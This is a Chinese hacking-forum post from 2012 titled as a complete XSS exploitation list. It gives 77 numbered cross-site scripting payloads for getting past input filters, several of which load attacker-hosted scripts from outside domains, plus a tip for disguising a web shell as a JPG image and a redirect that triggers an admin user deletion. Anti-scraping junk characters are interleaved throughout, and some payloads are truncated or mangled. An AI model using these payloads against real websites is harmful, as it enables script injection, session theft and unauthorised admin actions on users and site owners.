找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2256|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell. C3 C# d2 d- A7 _1 G+ y
XSS跨站代码  <script>alert("")</script>
2 w3 c" w) e! \; n( b+ Y: Y" ?6 B* @* T' Y2 B" k8 B3 I. U
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马, C0 K' q* U% m6 N8 }3 r
6 z0 I+ B$ q# C1 @& o$ h$ N
+ u: B0 Z/ [5 Q7 M

, D* J5 C, w8 c" l1)普通的XSS JavaScript注入4 T0 l2 T& h- U
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 x+ [6 @8 |+ M; j0 k. ~" A, M8 L0 f0 _$ ^& y# Y2 C. H" |% V% c3 f
(2)IMG标签XSS使用JavaScript命令/ j+ ~0 `0 @0 l: v/ V# d4 ]2 T3 p
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' _1 u$ G/ H; g
5 b3 R/ `) r5 c; R(3)IMG标签无分号无引号
6 r' H5 b; w2 g9 m* d<IMG SRC=javascript:alert(‘XSS’)>
& c6 @# X: g+ i- [6 f* N, ?% [
+ ^# M  b; e6 \# _(4)IMG标签大小写不敏感9 v1 h" g5 K4 v5 X) p# ~
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>3 S- ?5 u& _$ D  o& M
+ d* l$ a- V6 F2 u
(5)HTML编码(必须有分号)" `0 V  f; n) o3 r8 V( n& n
<IMG SRC=javascript:alert(“XSS”)>! J" A/ j7 H4 i# {. U- q

/ k0 H1 L  ]7 x; N  j(6)修正缺陷IMG标签
2 L+ }$ J8 F. a* X; F! Q; A4 z+ H! }/ h<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>$ W& n2 |/ `, U

4 `3 j0 E; l, L0 K(7)formCharCode标签(计算器)
% O% ~* a/ Q/ S2 Y5 i6 I<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 w. b; A0 E7 E  M* T4 f* f0 y
5 J# x5 l- W5 S3 w8 j2 r8 H(8)UTF-8的Unicode编码(计算器); T7 R8 [2 i2 I2 w: ^+ ]! x
<IMG SRC=jav..省略..S')>
9 a; N! U) Y3 m0 {) Q, O
0 u+ {, H4 Y" O5 M(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
8 P$ N/ k$ M% I" Y4 P<IMG SRC=jav..省略..S')>/ u0 P: m0 q4 ^0 i5 i2 l
9 Z5 j! K: X3 \, ~- ~
(10)十六进制编码也是没有分号(计算器)- b+ ^; a4 n' K9 X0 x4 h
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
3 C% u' g% K1 L! \' p/ Q, H
3 q1 |/ _% x! F5 m(11)嵌入式标签,将Javascript分开
! {7 l& F1 H+ k! e. ]* g/ P<IMG SRC=”jav ascript:alert(‘XSS’);”>
; q% ]; q$ ^* A1 g0 N, j: A$ ?  j1 C% w5 h. O
(12)嵌入式编码标签,将Javascript分开3 A( F- u; R7 a5 b' I
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 u$ h0 a( I4 H

. q" t1 {, m- c3 A& \(13)嵌入式换行符/ `" H+ D6 b& [, M3 ]( d0 b
<IMG SRC=”jav ascript:alert(‘XSS’);”>. k6 q- g( l% @0 c0 S. [

1 M: T. W9 c; {4 n& D: O+ w1 ](14)嵌入式回车4 K/ {1 c7 L9 o7 ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 j- h2 q" H% G! W: ?2 y

- C  p$ ?7 c: j* g(15)嵌入式多行注入JavaScript,这是XSS极端的例子+ X+ P6 a+ m" j* ?; R# v
<IMG SRC=”javascript:alert(‘XSS‘)”>
( {+ K4 x2 @% o, J. w9 P5 L3 v9 _
+ x' E& e' c- e4 U/ l  N4 z/ b(16)解决限制字符(要求同页面)) D1 r8 l: k9 m" W! f5 d
<script>z=’document.’</script>
, y6 \; {: J3 s<script>z=z+’write(“‘</script>
2 P$ F; q( q) X1 y+ P' H& B8 B<script>z=z+’<script’</script>& e+ Z( j$ }' X
<script>z=z+’ src=ht’</script>' p4 N3 L' X2 _, v8 k
<script>z=z+’tp://ww’</script>. ~1 s5 ~# \6 [
<script>z=z+’w.shell’</script>
; D' K! }/ N* C) U<script>z=z+’.net/1.’</script>
' t" O" C7 Q/ l' _2 ^<script>z=z+’js></sc’</script>) w. z* ~5 P1 Q) H  s" P2 H
<script>z=z+’ript>”)’</script>
" T8 B/ z; E3 V* V9 G. P<script>eval_r(z)</script>
" S# g7 l! {; P$ l9 e. M9 u' ^- D6 f
(17)空字符
& C1 j- m" Y- y  H: ~perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out0 j) V6 }" |: p2 F' `

: |; ~) T6 }( X8 a( T+ o(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
2 v* n% k$ K! _perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
1 y$ S- R% Z) B+ X; _0 R, o9 R2 q
# S. N- |* h$ d3 b: k/ T( @(19)Spaces和meta前的IMG标签
/ y. q1 @- N. ]  i<IMG SRC=” javascript:alert(‘XSS’);”>
0 ?1 c+ W* t  v: g3 z, G3 N9 v, ?4 p- g- x+ B
(20)Non-alpha-non-digit XSS
. ~* d. }' p! {# E<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) f1 s, C7 q! u  X+ h

9 ^2 C: l& _4 c: u9 N(21)Non-alpha-non-digit XSS to 2
4 N+ _  W' M. v0 l<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
3 i2 H# L' U: \. L+ U
. ^% [5 w8 ]4 ](22)Non-alpha-non-digit XSS to 3
3 g0 {5 ?% h# u  A% O5 R<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" w# P9 X& ~% V5 G% |7 l9 p2 b8 W' N4 q2 u( D) P
(23)双开括号
' R  G: v& j5 j' N; f<<SCRIPT>alert(“XSS”);//<</SCRIPT>
7 b1 p$ t2 D. s( Q7 }; r6 S
3 U- }$ ?! m  D' e(24)无结束脚本标记(仅火狐等浏览器)$ e& a# u. d5 @" o/ ?
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B># q7 K/ }- H  m8 p  t% f/ o3 L, q
3 M3 p9 j4 t# ]2 @* z
(25)无结束脚本标记22 E/ m4 R; L# c; _& n# k9 P' u
<SCRIPT SRC=//3w.org/XSS/xss.js>7 j. Z" i, o4 j5 Y% W) G* z

; p% f% A9 e# D- @(26)半开的HTML/JavaScript XSS
4 a$ u5 X4 M7 E: i6 q<IMG SRC=”javascript:alert(‘XSS’)”" |6 A( t% f( A1 ~8 m

3 G* d9 h/ D; P; P(27)双开角括号
; G, i! S1 I! L6 D( N* b( M<iframe src=http://3w.org/XSS.html <
) w) n+ B7 Z5 |! [
: s: C. L8 A9 \- X5 _% P0 C(28)无单引号 双引号 分号' ]* O! n2 B" s) v  F; |
<SCRIPT>a=/XSS/* s+ f1 j  F) f+ o8 S* o, P* }% ?
alert(a.source)</SCRIPT>% w* A, ~, N# I' r! e$ M, H

7 [3 H3 i5 e- }- H0 _0 Z! E3 `, m(29)换码过滤的JavaScript
2 h: c  @) @, r$ g4 X( s! S7 ?) l\”;alert(‘XSS’);//  E) V+ U$ f/ y8 w( t/ f' G& Q. n
, N$ }) I; y( O; }  [# i
(30)结束Title标签
9 V1 Q" `+ W" @7 V* ~5 U  N</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
4 ]) r- C* |9 \8 [. i* d
, B0 Y7 B& j" h3 C' T" a" K+ n(31)Input Image
, ~; J9 Y$ {+ ^- E+ Q) U4 m/ Y<INPUT SRC=”javascript:alert(‘XSS’);”>( X+ n4 z: ^$ G# H
: W4 n6 b9 V! ~, e# ?; E2 J
(32)BODY Image9 ]" D9 ^. i1 R% q
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
7 ]. n1 F# v* i$ C$ e/ x$ \/ S9 N. ^: ^4 U! z4 q; D. w
(33)BODY标签
/ x2 e) {2 {  j0 ^0 [<BODY(‘XSS’)>) Q  U, \9 U& Q: @* M1 o! Z  e) T$ g

4 B+ N( q& E7 q2 m4 z, {(34)IMG Dynsrc
- _, X8 U& H. O$ C- P9 ?<IMG DYNSRC=”javascript:alert(‘XSS’)”># t, R. L( k% @  S# y- j. U) t5 U
/ M" @8 S5 ^+ i7 S& f
(35)IMG Lowsrc
( o" M( `& T% K" j<IMG LOWSRC=”javascript:alert(‘XSS’)”>, }& d$ D0 r, g4 J9 `1 _9 j
9 P! R% [6 m5 c: z' S; f% `3 y. t
(36)BGSOUND6 D& M9 e7 R" j* {% k9 ?% N9 T+ w
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
+ I2 |8 Q  [9 l- l; z  e
, U( q3 {, k: O; i  F, T(37)STYLE sheet
" L/ I9 j% K1 `* H$ Z' h<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
; Z; c8 N- E/ ~, V4 a4 l. p% [, x( g% q
(38)远程样式表; C2 B9 }! a7 U
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>7 F, R% f0 y4 G

$ ^" g9 @/ c4 e  h) M3 _$ l( w(39)List-style-image(列表式)
8 n  X4 a: _/ s5 g' a! Y2 C, x<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
/ ]; u! \, }' G7 r2 j! P; I
/ K3 J' V: I" q5 W; P; l2 p" Z9 M(40)IMG VBscript- A$ |. j5 T  V# k
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS! [) \) l6 G4 u; Q

8 [/ g% D$ k& E' j(41)META链接url
5 ~, T; B9 H, \; {  m<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>2 x" u( O. _) B2 Q
6 p% C0 G( n' r/ q
(42)Iframe
( ?+ E: |- |3 P3 h# |9 |<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
; d' Z0 ^3 J$ R# d7 K; Y(43)Frame3 h( C8 r) F( f4 }$ d' j4 k- L
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
3 h9 Q" o& A, P7 R! _; y# @+ w
5 l" M& |3 s& a; @3 W/ l% }' M(44)Table1 f) K6 Y2 g( x- @$ `) U" g0 q
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>& e$ r/ N8 o2 H$ g

. M8 w* L5 u" |(45)TD
2 D6 d) w- H1 }- [# ]8 ]! X4 l# r9 o<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 k; E" E' T' i5 |! a& v
& ~; w9 ^* ?4 j/ k1 G! p/ Y(46)DIV background-image
+ l% h, A, u# n$ O% k4 O<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 }3 F* x/ p9 R* {  _2 T7 m" L& u0 q

! m+ G. l! F/ Q' k* M% F& L(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)4 y. w, U1 A, p5 c5 B
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
% X5 O, u; o; i4 d# `+ x
4 F' ~) Z0 O2 r7 p% g(48)DIV expression
6 i: @0 ?+ h+ {+ o& Y' M! e1 K* W<DIV STYLE=”width: expression_r(alert(‘XSS’));”>7 T& R9 M5 r( F+ e% H6 Q7 I% o

* ?' x" f& c1 g& r$ l/ x. D5 Z(49)STYLE属性分拆表达
0 l1 W8 Y' d( B" Q( o<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
9 O5 y5 ~. q7 z2 [( @! J+ Z+ v+ ?/ R
(50)匿名STYLE(组成:开角号和一个字母开头)
- W# ], f+ c; P3 W. z, n" Y<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 V: {: \; b$ @& u' i5 ?: c
9 p" _( ~5 y* a0 b. ?7 `(51)STYLE background-image
4 Q9 ~/ v0 ]- w4 L( a<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>& W& @8 w/ n! P
6 J# g* X- K8 X; ~% V
(52)IMG STYLE方式
6 l3 N, s0 w( _exppression(alert(“XSS”))’>( T9 B8 C7 G) T6 y2 m/ V' h
! i. f3 F2 F9 c: f  ]& M% l6 n
(53)STYLE background: ?- w; O+ Q$ S' m
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
# n$ P& R) z* l6 @+ X5 o
! }! \9 h: S9 p% q(54)BASE2 g7 E2 H* Q' T# h# T$ o3 T" }
<BASE HREF=”javascript:alert(‘XSS’);//”>; E: A# |6 {4 ~' z

- m. @% a8 C( O0 |& ], |(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS& Q2 [/ ]% {' P+ g1 a' h8 _; x
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
9 W7 j- u  U) H7 t/ W! D
# C5 v, T# Y3 |8 v(56)在flash中使用ActionScrpt可以混进你XSS的代码. H) @, l* H: ]" J: u1 m
a=”get”;
/ }' g5 e# I! s4 \# Wb=”URL(\”";
4 a) u" H5 q% N8 O  O6 [2 W. ?c=”javascript:”;: Z) w1 i& q5 m
d=”alert(‘XSS’);\”)”;, N7 F  j( c, j: ?, N
eval_r(a+b+c+d);
" ]) E5 U7 ]) Y7 U& U8 x" F/ u8 O, H( [; m" `$ y' I" l9 Y' K
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上& R% ~# v. z/ j6 ?4 e$ n
<HTML xmlns:xss>
$ T6 v0 i6 P1 g<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
; E1 |3 h/ m( V& F# Q+ y, [<xss:xss>XSS</xss:xss>) f  ~! a, Y4 P( ~
</HTML>
. }' z3 O: U* g8 k, I
" W3 P) D0 j/ J(58)如果过滤了你的JS你可以在图片里添加JS代码来利用& c/ e" s/ i* f
<SCRIPT SRC=””></SCRIPT>
) |0 ^3 m3 |5 a, D& ?% Y
9 T( {6 g4 h0 i" n(59)IMG嵌入式命令,可执行任意命令2 d+ h, w2 Z7 M- C& W$ R( o# Y6 k
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
/ P' ?5 b7 A! r) K4 O& r( k' c
9 ~' R0 w  f, G& Z(60)IMG嵌入式命令(a.jpg在同服务器)
6 ~  I7 ~' p7 m* a; tRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser7 v- @$ z  ~$ Q/ |) E- s+ e* a9 @% F/ S' Y

0 k6 v; `" [* N- x# ?- d(61)绕符号过滤
1 s5 \' f$ I1 p* \$ [2 v5 {<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>; E$ k- ~5 W, i

1 l, R* d/ ]2 V+ v% a( Y(62)# f& e+ M. E, }1 n" h& ]4 D
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 P" v- r/ C* Y- ?& @9 k* [# k
' O+ U. Q0 S  E4 q: E3 F* o0 F(63)
9 C4 u9 `4 I, T<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>2 [2 o- u$ x2 O3 K1 e6 i/ N. S

2 I0 q5 c% K: T' _  k1 s(64)
# \0 U& b8 {8 B<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>; y' p9 h: ~0 H% H7 m3 X

4 b  d) h" O3 |4 D. }8 K(65)
8 l7 U0 p. E  I+ \<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
3 E( K* c2 V3 Z6 g7 I
, L+ V' E1 m/ c- @9 n(66)% N* M: H7 V. Y& N
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 [+ }9 {+ D5 G, w# I) S* k: `! U! z% y! f5 w8 l
(67)* S( G( s+ i7 u; \  {3 H
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>( Z2 a7 W# D" D- G7 H

% H) ]' b4 t' d. x4 @9 o(68)URL绕行
8 D" s% G6 G6 l/ Y# i# I<A HREF=”http://127.0.0.1/”>XSS</A>0 N! u5 X- @% ]% }0 Q4 c( u

0 T4 k/ E1 {+ P" ^3 ?) a(69)URL编码
0 X( @8 D- v  k) j( x! b9 z/ b( h<A HREF=”http://3w.org”>XSS</A>4 X2 R) l7 M5 Z. i' h! C

" ^+ V: V5 W" j(70)IP十进制
7 \9 j. l6 x& w* _<A HREF=”http://3232235521″>XSS</A>. o1 d5 R7 T1 t% Y; A- Y
) W. t$ I, M2 ~, c8 B1 q+ Q
(71)IP十六进制# O3 ]# {2 c; ~% s# |* g
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 Q% j0 y/ R; D( ~+ e0 m5 a9 z
(72)IP八进制
5 q) R1 N8 L4 T0 G<A HREF=”http://0300.0250.0000.0001″>XSS</A>
$ c* j8 K5 I0 t% G% S' P" B+ ]; P& ?+ _
(73)混合编码9 B, V# _  Y' p
<A HREF=”h
2 U' H( X% \) K& o$ y) Ytt p://6 6.000146.0×7.147/”">XSS</A>
, o/ l, [6 y& ~! q# e2 \+ D
. g; z  H( G* c(74)节省[http:]
7 y3 X5 Z+ X' B. V<A HREF=”//www.google.com/”>XSS</A>0 A; L) \& G) H! T6 w
; S) n! K6 _3 d% c/ t  X* i
(75)节省[www]' o0 O" W. S( y; @) L
<A HREF=”http://google.com/”>XSS</A>: L( I* ^& {, @: J6 F4 p

2 M, J0 I% m* b4 ]1 U( [/ s(76)绝对点绝对DNS7 t9 _2 l* ~6 h& ^1 Y
<A HREF=”http://www.google.com./”>XSS</A>% X! \* u; w  x" ^4 H0 {

$ O  ~0 b3 P- e9 u' U1 r4 N(77)javascript链接! |7 f+ b/ f7 I+ X
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A># q7 ?! w" q; r# ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表